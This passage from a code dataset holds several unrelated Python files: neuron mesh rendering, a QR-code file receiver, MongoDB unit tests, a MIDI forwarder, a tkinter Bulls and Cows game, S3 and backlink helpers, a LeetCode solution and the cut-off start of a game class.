soma_pos,\n soma_radius,\n nrn.soma,\n ),\n )\n\n for ntype, nclass in self._neurite_types.items():\n self.points[ntype] = [\n component(\n n.points[:, 0],\n n.points[:, 1],\n n.points[:, 2],\n n.points[:, :3],\n n.points[:, -1],\n 
n,\n )\n for n in nrn.neurites\n if n.type == nclass\n ]\n\n def _parse_mesh_kwargs(self, **kwargs):\n # To give the entire neuron the same color\n neuron_color = kwargs.pop(\"neuron_color\", None)\n\n # To give the entire neuron a color based on a cmap\n neuron_number = kwargs.pop(\"neuron_number\", None)\n cmap_lims = kwargs.pop(\"cmap_lims\", (-1, 1))\n cmap = kwargs.pop(\"cmap\", None)\n\n # To color each component individually\n soma_color = kwargs.pop(\"soma_color\", \"salmon\")\n apical_dendrites_color = kwargs.pop(\"apical_dendrites_color\", \"salmon\")\n basal_dendrites_color = kwargs.pop(\n \"basal_dendrites_color\", apical_dendrites_color\n )\n axon_color = kwargs.pop(\"axon_color\", \"salmon\")\n whole_neuron_color = kwargs.pop(\"whole_neuron_color\", None)\n\n # Get each components color from args\n if neuron_color is not None: # uniform color\n soma_color = (\n apical_dendrites_color\n ) = basal_dendrites_color = axon_color = neuron_color\n elif cmap is not None: # color according to cmap\n if neuron_number is None:\n neuron_number = 0\n\n soma_color = colorMap(\n neuron_number, name=cmap, vmin=cmap_lims[0], vmax=cmap_lims[1]\n )\n apical_dendrites_color = (\n basal_dendrites_color\n ) = axon_color = soma_color\n\n else: # Use color specified for each component\n pass\n\n if whole_neuron_color is None:\n whole_neuron_color = soma_color\n return (\n soma_color,\n apical_dendrites_color,\n basal_dendrites_color,\n axon_color,\n whole_neuron_color,\n kwargs,\n )\n\n def create_mesh(\n self, neurite_radius=2, soma_radius=4, use_cache=True, **kwargs\n ):\n if self.points is None:\n logger.warning(\n \"No data loaded, you can use the 'load_from_file' method to try to load the file.\"\n )\n return\n\n # Parse kwargs\n (\n soma_color,\n apical_dendrites_color,\n basal_dendrites_color,\n axon_color,\n whole_neuron_color,\n kwargs,\n ) = self._parse_mesh_kwargs(**kwargs)\n\n if (\n not isinstance(neurite_radius, (int, float))\n or not neurite_radius > 0\n ):\n raise ValueError(\n \"Invalid value for parameter neurite_radius, should be a float > 0\"\n )\n if not isinstance(soma_radius, (int, float)) or not soma_radius > 0:\n raise ValueError(\n \"Invalid value for parameter soma_radius, should be a float > 0\"\n )\n # prepare params dict for caching\n _params = dict(neurite_radius=neurite_radius, soma_radius=soma_radius)\n\n # Check if cached files already exist\n if use_cache:\n neurites = self.load_cached_neuron(self.neuron_name, _params)\n else:\n neurites = None\n\n # Render\n if neurites is not None:\n whole_neuron = neurites.pop(\"whole_neuron\")\n neurites[\"soma\"].c(soma_color)\n else:\n # Create soma actor\n neurites = {}\n coords = self.points[\"soma\"].coords\n if self.invert_dims:\n coords = coords[[2, 1, 0]]\n\n soma = Sphere(\n pos=coords,\n r=self.points[\"soma\"].radius * soma_radius,\n c=soma_color,\n ).compute_normals()\n neurites[\"soma\"] = soma.clone().c(soma_color)\n\n # Create neurites actors\n for ntype in self._neurite_types:\n actors = []\n for neurite in self.points[ntype]:\n for section in iter_sections(neurite.component):\n for child in section.children:\n if not child.children:\n coords = child.points[:, COLS.XYZ]\n if self.invert_dims:\n coords = coords[:, [2, 1, 0]]\n actors.append(Tube(coords, r=neurite_radius))\n else:\n for grandchild in child.children:\n coords = grandchild.points[:, COLS.XYZ]\n if self.invert_dims:\n coords = coords[:, [2, 1, 0]]\n actors.append(\n Tube(coords, r=neurite_radius)\n )\n\n if actors:\n neurites[ntype] = merge(\n 
actors\n ).compute_normals() # .smoothMLS2D(f=0.1)\n else:\n neurites[ntype] = None\n\n # Merge actors to get the entire neuron\n actors = [\n act.clone() for act in neurites.values() if act is not None\n ]\n whole_neuron = merge(actors).clean().compute_normals()\n\n # Write to cache\n to_write = neurites.copy()\n to_write[\"whole_neuron\"] = whole_neuron\n self.write_neuron_to_cache(self.neuron_name, to_write, _params)\n\n # Color actors\n colors = [basal_dendrites_color, apical_dendrites_color, axon_color]\n for n, key in enumerate(\n [\"basal_dendrites\", \"apical_dendrites\", \"axon\"]\n ):\n if neurites[key] is not None:\n neurites[key] = neurites[key].c(colors[n])\n whole_neuron.c(whole_neuron_color)\n\n return neurites, whole_neuron\n","repo_name":"brainglobe/morphapi","sub_path":"morphapi/morphology/morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":9755,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"92"} +{"seq_id":"16798022283","text":"import base64\nfrom time import sleep\nfrom PIL import Image\n\nimport cv2\n\nfrom utils import BREAK_KEY, DEBUG, EOF, FIRST_CHUNK_INDEX, create_qr, get_next_index, trace\n\n_ACK_WINDOW = 'ack'\n\n@trace\ndef _next_chunk(frame):\n \"\"\"\n Read the next file chunk from frame, \n if chunk is EOF, we return it's index and done=true\n if chunk does not exist, we return no data and done=false\n if chunk exists, we return it's data and index.\n \"\"\"\n chunk, _, _ = cv2.QRCodeDetector().detectAndDecode(frame)\n\n if len(chunk) == 0:\n return None, None, False\n\n i = int(chunk[:1])\n chunk = chunk[1:]\n\n if chunk == EOF: # If we encountered the end of transmission QR\n return i, None, True\n\n return i, base64.standard_b64decode(chunk), False\n\n@trace\ndef _ack(i):\n \"\"\"\n Show an ack for index `i`\n\n i integer\n \"\"\"\n img = create_qr(str(i).encode())\n if DEBUG:\n Image.fromarray(img).save(f\"ack_{i}.png\")\n cv2.imshow(_ACK_WINDOW, img)\n\ndef _read_loop(f, cap):\n \"\"\"\n This is the read loop,\n we read a frame, if it has significant data, we write it to the file.\n\n f file descriptor\n cap cv2.VideoCapture\n \"\"\"\n next_index = FIRST_CHUNK_INDEX \n\n while True:\n _, frame = cap.read()\n if frame is None:\n raise IOError(\"Can't read from camera\")\n\n i, data, done = _next_chunk(frame)\n if done:\n _ack(i)\n cv2.waitKey(10000) # Show the final ack for 10 seconds, then exit\n return\n\n if data is None:\n sleep(1)\n continue\n\n if i == next_index: # we got the correct chunk, write it and keep going\n f.write(data)\n next_index = get_next_index(next_index)\n\n _ack(i) # ack even if we didn't get the correct index\n\n # Stop the loop if BREAK_KEY is pressed, for testing purposes.\n if cv2.waitKey(1) & 0xFF == ord(BREAK_KEY):\n break\n@trace\ndef read_file_to_path(cap, path):\n \"\"\"\n Write a file from qr capture to file path\n\n cap cv2.VideoCapture\n path file path\n \"\"\"\n with open(path, 'wb') as f:\n _read_loop(f, cap)\n\n\n cv2.destroyAllWindows()\n\n","repo_name":"yairfrid/qr_ft","sub_path":"qr_client.py","file_name":"qr_client.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17934009208","text":"import unittest\nimport alias_service\nfrom mock import patch, Mock\nimport mongomock\nfrom ConfigParser import ConfigParser\nfrom dao import Dao\nfrom model import *\nimport json\nfrom bson.objectid import ObjectId\nfrom pymongo import 
MongoClient\n\nDATABASE_NAME = 'garpr_test'\nCONFIG_LOCATION = 'config/config.ini'\n\nclass TestAliasService(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n config = ConfigParser()\n config.read(CONFIG_LOCATION)\n username = config.get('database', 'user')\n host = config.get('database', 'host')\n auth_db = config.get('database', 'auth_db')\n password = config.get('database', 'password')\n self.mongo_client = MongoClient(host='mongodb://%s:%s@%s/%s' % (username, password, host, auth_db))\n self.mongo_client.drop_database(DATABASE_NAME)\n\n def setUp(self):\n self.maxDiff = None\n\n self.player_1_id = ObjectId()\n self.player_2_id = ObjectId()\n self.player_3_id = ObjectId()\n self.player_4_id = ObjectId()\n self.player_5_id = ObjectId()\n self.player_1 = Player(\n name='gaR',\n aliases=['gar', 'garr'],\n ratings={'norcal': Rating(), 'texas': Rating()},\n regions=['norcal', 'texas'],\n id=self.player_1_id)\n self.player_2 = Player(\n name='sfat',\n aliases=['sfat', 'miom | sfat'],\n ratings={'norcal': Rating()},\n regions=['norcal'],\n id=self.player_2_id)\n self.player_3 = Player(\n name='mango',\n aliases=['mango', 'gar'],\n ratings={'norcal': Rating(mu=2, sigma=3)},\n regions=['socal'],\n id=self.player_3_id)\n self.player_4 = Player(\n name='garpr|gar',\n aliases=['garpr|gar'],\n ratings={'norcal': Rating(mu=2, sigma=3)},\n regions=['norcal'],\n id=self.player_4_id)\n\n self.players = [self.player_1, self.player_2, self.player_3, self.player_4]\n\n self.user_id_1 = 'abc123'\n self.user_admin_regions_1 = ['norcal']\n self.username1 = 'Full Name'\n # def __init__(self, id, admin_regions, username, salt, hashed_password):\n self.user_1 = User(id=self.user_id_1,\n admin_regions=self.user_admin_regions_1,\n username=self.username1,\n salt='nacl',\n hashed_password='browns')\n\n self.users = [self.user_1]\n\n self.region_1 = Region(id='norcal', display_name='Norcal')\n Dao.insert_region(self.region_1, self.mongo_client, database_name=DATABASE_NAME)\n self.norcal_dao = Dao('norcal', self.mongo_client, database_name=DATABASE_NAME)\n\n for player in self.players:\n self.norcal_dao.insert_player(player)\n\n\n def tearDown(self):\n self.mongo_client.drop_database(DATABASE_NAME)\n\n def test_get_player_suggestions_from_player_aliases(self):\n self.assertEquals(alias_service.get_player_suggestions_from_player_aliases(self.norcal_dao, ['gar', 'garpr | gar', 'g a r r']),\n {\n \"gar\": [self.player_1, self.player_3],\n \"garpr | gar\": [self.player_1, self.player_3, self.player_4],\n \"g a r r\": [self.player_1]\n })\n\n def test_get_player_or_suggestions_from_player_aliases(self):\n self.assertEquals(alias_service.get_player_or_suggestions_from_player_aliases(self.norcal_dao, ['gar', 'garpr | gar', 'g a r r']),\n {\n \"gar\": {\n \"player\": self.player_1,\n \"suggestions\": [self.player_1, self.player_3]\n },\n \"garpr | gar\": {\n \"player\": None,\n \"suggestions\": [self.player_1, self.player_3, self.player_4],\n },\n \"g a r r\": {\n \"player\": None,\n \"suggestions\": [self.player_1]\n }\n })\n\n def test_get_top_suggestion_for_aliases(self):\n suggestions = alias_service.get_top_suggestion_for_aliases(self.norcal_dao, ['gar', 'garpr | gar'])\n expected_suggestions = {\n \"gar\": self.player_1,\n \"garpr | gar\": self.player_1,\n }\n\n self.assertEquals(suggestions, expected_suggestions)\n\n def test_get_top_suggestion_for_aliases_none(self):\n suggestions = alias_service.get_top_suggestion_for_aliases(self.norcal_dao, ['gar', 'garpr | gar', 'ASDFASDF'])\n expected_suggestions = 
{\n \"gar\": self.player_1,\n \"garpr | gar\": self.player_1,\n \"ASDFASDF\": None\n }\n\n self.assertEquals(suggestions, expected_suggestions)\n\n def test_get_alias_to_id_map_in_list_format(self):\n suggestions = alias_service.get_alias_to_id_map_in_list_format(\n self.norcal_dao, ['gar', 'garpr | gar', 'ASDFASDF'])\n expected_suggestions = [\n AliasMapping(player_alias=\"gar\", player_id=self.player_1.id),\n AliasMapping(player_alias=\"garpr | gar\", player_id=self.player_1.id),\n AliasMapping(player_alias=\"ASDFASDF\", player_id=None)\n ]\n\n self.assertEquals(len(suggestions), 3)\n self.assertTrue(expected_suggestions[0] in suggestions)\n self.assertTrue(expected_suggestions[1] in suggestions)\n self.assertTrue(expected_suggestions[2] in suggestions)\n","repo_name":"garsh0p/garpr","sub_path":"test/test_alias_service.py","file_name":"test_alias_service.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"92"} +{"seq_id":"11411896987","text":"#\n# @Author: Paolo Rosettani\n# @Date: 24/05/2021 (DD/MM/YYY)\n# @Description:\n# This code receive any kind of message received from an external MIDI device (like a Cymatic)\n# Forward the received MIDI message to a loopMIDI channel with an addition MIDI command that trigger\n# the play button on \"LivePrompter\".\n#\n# In this way it keep simple the MIDI programing for the Cymatic, it just trigger a Program Change\n# matched with a ceratin song (in LivePrompter), and ti peace of code include the play command (send by\n# a MIDI Control Change).\n#\n\nimport mido\nimport os\nimport time\nimport sys\n\noutputMIDI='loopMIDI 1' #To LivePrompter\ninputMIDI='emulatore 1' #From Cymatic\ntry:\n outport = mido.open_output(outputMIDI, autoreset=True) #Oper output MIDI port\n inport = mido.open_input(inputMIDI, autoreset=True) #Open input MIDI port\n\n\n\n print('Waiting MIDI message from Cymatic...')\n print()\n msg = inport.receive() # Leggo il messagio dal Cymatic\n\n if msg.type == 'program_change':\n print('Forward:')\n print(msg) # Visualizzo il messaggio ricevuto\n outport.send(msg) # Inoltro il messaggio a Live Prompter\n\n # Play MIDI command\n print('Play command:')\n play = mido.Message('control_change', control=7, value=10) #Play\n print(play)\n outport.send(play)\n\n else:\n print('MIDI message Discarded: not a control_change!')\n\n print() #New line\n\n time.sleep(1)\n \n os.execl(sys.executable, 'python', __file__, *sys.argv[1:]) #Restart program\n\nexcept:\n print('Unable to open MIDI port(s).')\n print('Is the loopMIDI program running?')\n print('Is the MIDI-usb adapter connected?')\n print('Window closing in 10 seconds...')\n time.sleep(10)","repo_name":"paoloros97/AutoPlay_LivePrompter","sub_path":"OldStuff/AutoPlayerOld.py","file_name":"AutoPlayerOld.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"10060002600","text":"from ttkthemes import ThemedStyle\nimport tkinter as tk\nfrom tkinter import ttk, messagebox\nfrom PIL import Image, ImageTk\nimport random\nimport data\nimport images\n\n# Global declarations\nDATA_FILE = \"data/isograms.txt\"\nSETTINGS_FILE = \"data/settings.txt\"\n# End global declarations\n\n\nclass BullsAndCows:\n def __init__(self):\n self.current_word = \"\"\n self.current_guess = \"\"\n self.current_result = \"\"\n self.isogram_list = []\n self.guess_number = 0\n self.max_guesses = 0\n self.max_word_length = 0\n 
self.min_word_length = 0\n self.get_settings()\n self.load_data_file()\n self.game_running = False\n self.guess_history_items = []\n self.result_history_items = []\n\n def load_data_file(self, debug=False):\n with open(DATA_FILE, \"r\") as file:\n self.isogram_list = file.readlines()\n for i, word in enumerate(self.isogram_list):\n self.isogram_list[i] = word.lower().strip() # sanitize word list\n if debug:\n print(self.isogram_list)\n\n def get_settings(self, debug=False):\n with open(SETTINGS_FILE, \"r\") as file:\n config = file.readlines()\n for setting in config:\n if debug:\n print(setting)\n if \"max_guesses\" in setting:\n self.max_guesses = int(setting.split(\"=\")[1])\n if \"max_word_length\" in setting:\n self.max_word_length = int(setting.split(\"=\")[1])\n if \"min_word_length\" in setting:\n self.min_word_length = int(setting.split(\"=\")[1])\n\n def new_game(self, debug=False):\n self.current_word = \"\"\n self.current_guess = \"\"\n self.current_result = \"\"\n self.isogram_list = []\n self.guess_number = 1\n self.max_guesses = 0\n self.max_word_length = 0\n self.min_word_length = 0\n self.get_settings()\n self.load_data_file()\n self.game_running = True\n for label in self.guess_history_items:\n label.grid_remove()\n for label in self.result_history_items:\n label.grid_remove()\n\n self.current_word = \"\"\n\n while len(self.current_word) < self.min_word_length or len(self.current_word) > self.max_word_length:\n self.current_word = random.choice(self.isogram_list)\n self.max_guesses = len(self.current_word) + 2\n if debug:\n print(len(self.current_word))\n print(self.min_word_length)\n print(self.max_word_length)\n print(self.current_word)\n print(self.guess_number)\n\n self.current_guess = 1\n player_guess_label.config(text=f\"Guess #{self.current_guess} of {self.max_guesses}: \")\n cows_speak_label.config(text=f\"We have chosen a secret word with {len(self.current_word)} characters.\")\n\n def set_result(self, current_guess_number: int, current_guess: str, result: str, debug=False):\n if debug:\n print(self.guess_history_items)\n self.guess_history_items[current_guess_number].config(text=current_guess)\n self.guess_history_items[current_guess_number].grid(pady=5)\n self.result_history_items[current_guess_number].config(text=result)\n self.result_history_items[current_guess_number].grid(pady=5)\n\n @staticmethod\n def split_word(word):\n return [char for char in word]\n\n @staticmethod\n def intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\n def make_guess(self):\n if self.game_running:\n self.current_guess = player_guess_entry.get()\n self.current_guess = self.current_guess.lower()\n if len(self.current_guess) == len(self.current_word):\n # print(f\"Current guess number: {self.guess_number} of {self.max_guesses}\")\n\n guess = self.split_word(self.current_guess)\n secret_word = self.split_word(self.current_word)\n intersection = self.intersection(guess, secret_word)\n\n # print(f\"inter = {intersection}\")\n # print(f\"guess = {guess}\")\n results = \"\"\n # print(f\"Secret word len = {len(secret_word)}\")\n for i, letter in enumerate(secret_word):\n # print(i)\n if guess[i] not in intersection:\n results += \"X\"\n continue\n if guess[i] == secret_word[i]:\n results += \"B\"\n continue\n else:\n results += \"C\"\n\n self.set_result(self.guess_number, self.current_guess, str(results))\n\n if self.current_guess == self.current_word:\n if self.play_again(True):\n self.new_game()\n elif self.guess_number >= self.max_guesses:\n # 
print(\"Player has lost.\")\n if self.play_again(False):\n self.new_game()\n else:\n self.game_running = False\n else:\n self.guess_number += 1\n player_guess_label.config(text=f\"Guess #{self.guess_number} of {self.max_guesses}: \")\n else:\n messagebox.showinfo(message=f\"You gave {len(self.current_guess)} letters instead of {len(self.current_word)}\")\n\n def play_again(self, win_or_lose: str):\n if not win_or_lose:\n return messagebox.askyesno(\n message=f\"Sorry, you loose. The secret word was: {self.current_word} Try again?\",\n icon=\"question\", title=\"Confirm Quit\")\n if win_or_lose:\n return messagebox.askyesno(\n message=f\"\"\"\n Congratulations... You win!\n You got the word: {self.current_word} in {self.guess_number} guesses.\n Play again?\"\"\",\n icon=\"question\", title=\"Confirm Quit\")\n\n @staticmethod\n def about():\n messagebox.showinfo(message=\"\"\"\n Bulls and cows part Moo v1.0 was written in python\n using tkinter. This little pet project was created \n for my wife Dawn, who loved a console version I had \n written years ago. I just thought it was about\n time to give her a modern version :)\"\"\")\n\n @staticmethod\n def how_to_play():\n messagebox.showinfo(message=\"\"\"\n Bulls and cows is a word game where you try to guess\n the secret word of the cows. Every chosen secret\n word is an isogram (meaning no letters are repeated).\n after each guess you will be presented with results\n like 'XCBXXBC' where 'X' means that letter is not in the\n word. A 'C' or cow is given for correct letters but in\n the wrong place. Finally a 'B' or bull is given for\n each correct letter in the right place. You will be\n given a number of tries equal to 2 plus the length\n of the current secret word. Get the word right and\n you win! Good luck!\"\"\")\n\n\ngame = BullsAndCows()\n\nroot = tk.Tk()\nroot.resizable(False, False)\nroot.title(\"Bulls and cows\")\nroot.option_add('*tearOff', False)\n\nstyle = ThemedStyle(root)\n# print(style.get_themes())\nstyle.set_theme(\"plastik\")\n\nmain = ttk.Frame(root)\nmain.grid(row=0, column=0)\n\nmenu_bar = tk.Menu()\nroot.config(menu=menu_bar)\n\nhelp_menu = tk.Menu(menu_bar)\nmenu_bar.add_cascade(menu=help_menu, label=\"Help\")\nhelp_menu.add_command(label=\"About\", command=game.about)\nhelp_menu.add_command(label=\"How to play\", command=game.how_to_play)\n\nlogo_image = Image.open(\"images/Cows.gif\")\nlogo_image = logo_image.resize((300, 300), Image.ANTIALIAS)\nlogo_image = ImageTk.PhotoImage(logo_image)\n\nleft_frame = tk.Frame(main)\ncenter_frame = tk.Frame(main)\nright_frame = tk.Frame(main)\nbottom_frame = tk.Frame(main)\n\nleft_frame.grid(row=0, column=0, sticky=\"sw\", padx=10)\ncenter_frame.grid(row=0, column=1, sticky=\"nsew\")\nright_frame.grid(row=0, column=2, sticky=\"nsew\")\nbottom_frame.grid(row=1, column=0, columnspan=3, sticky=\"nsew\", pady=10)\n\ntitle_label = ttk.Label(center_frame, text=\"Bulls and Cows Part Moo\", anchor=\"center\")\ntitle_label.config(font=(\"Times\", 20))\ntitle_label.grid(row=0, column=0, sticky=\"n\")\n\nmain_image = tk.Label(center_frame, image=logo_image, anchor=\"center\")\nmain_image.image = logo_image\nmain_image.grid(row=1, column=0)\n\ncows_speak_label = ttk.Label(center_frame, text=\"We have not chosen a word yet. 
Please start game.\")\ncows_speak_label.grid(row=2, column=0)\n\nplayer_frame = tk.Frame(center_frame)\nplayer_guess_label = ttk.Label(player_frame, text=f\"Guess #{game.guess_number} of {game.max_guesses}:\")\nplayer_guess_entry = ttk.Entry(player_frame)\nsubmit_guess_button = ttk.Button(player_frame, text=\"Submit\", command=game.make_guess)\nplayer_frame.grid(row=3, column=0)\nplayer_guess_label.grid(row=0, column=0)\nplayer_guess_entry.grid(row=0, column=1)\nsubmit_guess_button.grid(row=0, column=2)\n\nguess_history_label = ttk.Label(right_frame, text=\"Guesses\", font=\"timesx12\")\nguess_history_label2 = ttk.Label(right_frame, text=\"Results\", font=\"timesx12\")\nguess_history_label.grid(row=0, column=0, padx=10)\nguess_history_label2.grid(row=0, column=1, padx=10)\n\nguess1_history = ttk.Label(right_frame, text=\"\", font=\"timesx8\")\nresult1_history = ttk.Label(right_frame, text=\"\", font=\"timesx8\")\nguess2_history = ttk.Label(right_frame, text=\"\", font=\"timesx8\")\nresult2_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess3_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult3_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess4_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult4_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess5_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult5_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess6_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult6_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess7_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult7_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess8_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult8_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess9_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult9_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess10_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult10_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess11_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult11_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess12_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult12_history = ttk.Label(right_frame, text=\"\", 
font=\"timesx10\")\ngame.guess_history_items.append(guess1_history)\ngame.result_history_items.append(result1_history)\ngame.guess_history_items.append(guess2_history)\ngame.result_history_items.append(result2_history)\ngame.guess_history_items.append(guess3_history)\ngame.result_history_items.append(result3_history)\ngame.guess_history_items.append(guess4_history)\ngame.result_history_items.append(result4_history)\ngame.guess_history_items.append(guess5_history)\ngame.result_history_items.append(result5_history)\ngame.guess_history_items.append(guess6_history)\ngame.result_history_items.append(result6_history)\ngame.guess_history_items.append(guess7_history)\ngame.result_history_items.append(result7_history)\ngame.guess_history_items.append(guess8_history)\ngame.result_history_items.append(result8_history)\ngame.guess_history_items.append(guess9_history)\ngame.result_history_items.append(result9_history)\ngame.guess_history_items.append(guess10_history)\ngame.result_history_items.append(result10_history)\ngame.guess_history_items.append(guess11_history)\ngame.result_history_items.append(result11_history)\ngame.guess_history_items.append(guess12_history)\ngame.result_history_items.append(result12_history)\n\nguess1_history.grid(row=1, column=0)\nresult1_history.grid(row=1, column=1)\nguess2_history.grid(row=2, column=0)\nresult2_history.grid(row=2, column=1)\nguess3_history.grid(row=3, column=0)\nresult3_history.grid(row=3, column=1)\nguess4_history.grid(row=4, column=0)\nresult4_history.grid(row=4, column=1)\nguess5_history.grid(row=5, column=0)\nresult5_history.grid(row=5, column=1)\nguess6_history.grid(row=6, column=0)\nresult6_history.grid(row=6, column=1)\nguess7_history.grid(row=7, column=0)\nresult7_history.grid(row=7, column=1)\nguess8_history.grid(row=8, column=0)\nresult8_history.grid(row=8, column=1)\nguess9_history.grid(row=9, column=0)\nresult9_history.grid(row=9, column=1)\nguess10_history.grid(row=10, column=0)\nresult10_history.grid(row=10, column=1)\nguess10_history.grid(row=11, column=0)\nresult10_history.grid(row=11, column=1)\nguess10_history.grid(row=12, column=0)\nresult10_history.grid(row=12, column=1)\n\n\nnew_game_button = ttk.Button(left_frame, text=\"New Game\", command=game.new_game)\nsettings_button = ttk.Button(left_frame, text=\"Settings\")\nnew_game_button.grid(row=0, column=0)\n# settings_button.grid(row=1, column=0)\n\n\nstatusbar = tk.Label(\n bottom_frame,\n text=f\"data file: {DATA_FILE} loaded. 
({len(game.isogram_list)} words.)\",\n bd=1, relief=tk.SUNKEN, anchor=\"se\", width=90)\nstatusbar.grid(row=0, column=0)\n\n\nroot.bind(\"\", lambda event: game.make_guess())\n\n# define window dimensions width and height\nwindow_width = 635\nwindow_height = 415\n\n# get the screen size of computer\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\n\n# Get the window position from the top dynamically as well as position from left or right as follows\nposition_top = int(screen_height/2 - window_height/2)\nposition_right = int(((screen_width / 2) - 50) - ((window_width / 2) - 50))\n\n# now center that root window!\nroot.geometry(f'{window_width}x{window_height}+{position_right}+{position_top}')\nroot.iconbitmap(r'images/cow.ico')\n\n# game.set_result(1, True)\nroot.mainloop()\n","repo_name":"McGrathSolutions/Bulls_And_Cows_Part_Moo","sub_path":"bulls_and_cows.py","file_name":"bulls_and_cows.py","file_ext":"py","file_size_in_byte":14134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32140684767","text":"import json\n\n\ndef get_next_batch_of_ads_from_s3(s3_client: object, bucket: str, keys: list) -> list:\n if s3_client is None or keys is None or len(keys) == 0:\n return None\n\n ads = []\n\n for key in keys:\n response = s3_client.get_object(Bucket = bucket, Key = key)\n if 'Body' in response:\n ad = json.loads(response['Body'].read().decode('utf-8'))\n ads.append(ad)\n\n return ads\n\n\ndef get_next_batch_of_ad_keys(s3_client: object, bucket: str, prefix: str, max_keys: int = 3, continuation_token: str = None) -> list:\n response = None\n\n if continuation_token:\n response = s3_client.list_objects_v2(\n Bucket = bucket,\n Prefix = prefix,\n MaxKeys = max_keys,\n ContinuationToken = continuation_token\n )\n else:\n response = s3_client.list_objects_v2(\n Bucket = bucket,\n Prefix = prefix,\n MaxKeys = max_keys \n )\n\n keys: list = []\n continuation_token: str = None\n\n if 'Contents' not in response:\n return None, None\n\n for obj in response['Contents']:\n keys.append(obj['Key'])\n \n if 'NextContinuationToken' in response:\n continuation_token = response['NextContinuationToken']\n\n return keys, continuation_token","repo_name":"gutucristian/HTTPAdServer","sub_path":"s3_util.py","file_name":"s3_util.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"13563528626","text":"import re\nfrom typing import List\n\nfrom models.backlink import BackLink\nfrom models.link import Link\n\n\nclass BackLinkUtil:\n CONTENT_TEMPLATE = \"<<<<<<< Linked Reference\\n{content}\\n>>>>>>> End\"\n SECTION_PATTERN = r\"<<<<<<< Linked Reference([\\s\\S]*?)>>>>>>> End\"\n GROUP_PATTERN = r\"\\* (.*)((?:\\n \\* .*)+)\"\n\n def __init__(self, task) -> None:\n self.task = task\n self.content = \"\" if task.content is None else task.content\n self._parse_backlink()\n\n def parse_normal_links(self):\n normal_section = re.sub(BackLinkUtil.SECTION_PATTERN, \"\", self.content)\n return Link.parse_links(normal_section)\n\n def _parse_backlink(self):\n backlink_section_obj = re.findall(BackLinkUtil.SECTION_PATTERN, self.content)\n self.backlinks: List[BackLink] = []\n if len(backlink_section_obj) > 0:\n self.backlink_section = backlink_section_obj[0].strip()\n groups = re.findall(BackLinkUtil.GROUP_PATTERN, self.backlink_section)\n for group in groups:\n backlink_str, refers = group\n backlink = 
BackLink(Link(backlink_str))\n refers = [i for i in refers.split(\" * \") if (i != '\\n' and i != '')]\n for refer in refers:\n backlink.add_whole_line_str(refer.strip())\n self.backlinks.append(backlink)\n\n # print(f'Parse Link fail,link_str is \"{link_str}\", from task: {self.task.title}')\n\n @staticmethod\n def gen_backlink_section(backlinks: List[BackLink]):\n return BackLinkUtil.CONTENT_TEMPLATE.format(\n content=\"\\n\".join([i.gen_single_backlink_str() for i in backlinks])\n )\n","repo_name":"leolulu/dida365-api","sub_path":"utils/backlink_util.py","file_name":"backlink_util.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"70650585580","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def rangeSumBST(self, root, low, high):\n \"\"\"\n :type root: TreeNode\n :type low: int\n :type high: int\n :rtype: int\n \"\"\"\n if root==None:\n return 0;\n sum = 0;\n if(root.vallow:\n sum=sum+self.rangeSumBST(root.left,low,min(high,root.val));\n \n if(root.val<=high and root.val>=low):\n sum=sum+root.val\n \n return sum;","repo_name":"AnujPancholi/codingQuestionSolutions","sub_path":"leetcode/algorithms/tree/range-sum-of-bst.py","file_name":"range-sum-of-bst.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"1202010221","text":"from MyFunctions import *\n\n#Майнер бомжей\nclass BusStation():\n def __init__(self, user):\n self.user = user\n self.tile_to_default()\n self.objects_dict = {}\n self.NxNy = [12,8] #на сколько столбцов и строк резать изображение\n self.img = None\n self.lvl_list = [\n {'lvl': 1, 'cost': 0, 'bums':0, 'limit': 10, 'bps': 0.3, 'bum_cash': 0, 'draw_frame': 2, 'draw_col': 0}, #draw_col = номер группы из четырёх колонок для изменения изображения с уровнем\n {'lvl': 2, 'cost': 100, 'limit': 50, 'bps': 1, 'draw_col': 1},\n {'lvl': 3, 'cost': 1000, 